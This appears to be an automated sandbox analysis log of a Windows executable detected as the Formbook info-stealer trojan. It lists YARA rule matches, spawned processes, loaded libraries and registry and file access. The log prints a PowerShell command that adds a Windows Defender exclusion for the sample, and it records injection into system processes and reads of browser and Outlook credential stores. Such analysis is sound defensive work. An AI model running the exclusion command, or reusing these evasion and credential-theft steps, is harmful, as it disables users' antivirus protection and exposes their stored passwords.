Source: H25iQbxCki.exe, 00000000.00000002.1935708882.0000021490129000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIxebehitenezB vs H25iQbxCki.exe
Source: H25iQbxCki.exe, 00000000.00000002.1935708882.0000021490129000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNativeMethods.dll" vs H25iQbxCki.exe
Source: H25iQbxCki.exe, 00000000.00000002.1927554553.0000021480001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIxebehitenezB vs H25iQbxCki.exe
Source: H25iQbxCki.exe, 00000000.00000002.1946293779.00000214EBFC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNativeMethods.dll" vs H25iQbxCki.exe
Source: H25iQbxCki.exe, 00000000.00000000.1680279430.00000214EBB52000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNativeMethods.dll" vs H25iQbxCki.exe
Source: H25iQbxCki.exe, 00000000.00000000.1680318190.00000214EBB70000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEpazehomaye@ vs H25iQbxCki.exe
Source: H25iQbxCki.exe	Binary or memory string: OriginalFilenameNativeMethods.dll" vs H25iQbxCki.exe
Source: H25iQbxCki.exe	Binary or memory string: OriginalFilenameEpazehomaye@ vs H25iQbxCki.exe

Source: 5.2.ilasm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.ilasm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1869984902.0000000005ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4144364221.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.4145287645.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4144410750.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.4145259981.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1870033073.0000000005F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@17/11@16/9

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7420
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eysd10bw.ajf.ps1

Jump to behavior

Source: H25iQbxCki.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: H25iQbxCki.exe

Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%

Source: C:\Users\user\Desktop\H25iQbxCki.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\H25iQbxCki.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chkdsk.exe, 0000000C.00000003.2100748118.0000000004B08000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4144465962.0000000004B08000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: H25iQbxCki.exe	Virustotal: Detection: 43%
Source: H25iQbxCki.exe	ReversingLabs: Detection: 42%

Source: H25iQbxCki.exe

String found in binary or memory: L

Source: C:\Users\user\Desktop\H25iQbxCki.exe

File read: C:\Users\user\Desktop\H25iQbxCki.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\H25iQbxCki.exe "C:\Users\user\Desktop\H25iQbxCki.exe"
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\H25iQbxCki.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7420 -s 1344
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\H25iQbxCki.exe" -Force	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\H25iQbxCki.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\H25iQbxCki.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\chkdsk.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: H25iQbxCki.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: H25iQbxCki.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: H25iQbxCki.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Xml.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdbRSDS source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: wntdll.pdbUGP source: ilasm.exe, 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000003.1871541059.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000003.1869616615.0000000004C8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: wntdll.pdb source: ilasm.exe, ilasm.exe, 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000003.1871541059.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000003.1869616615.0000000004C8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2640.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdbH source: WER2640.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Xml.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER2640.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: chkdsk.pdbGCTL source: ilasm.exe, 00000005.00000002.1869476562.0000000005658000.00000004.00000020.00020000.00000000.sdmp, uwZgUlCQSPVT.exe, 0000000A.00000003.1808867290.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.pdb/ source: WER2640.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2640.tmp.dmp.9.dr
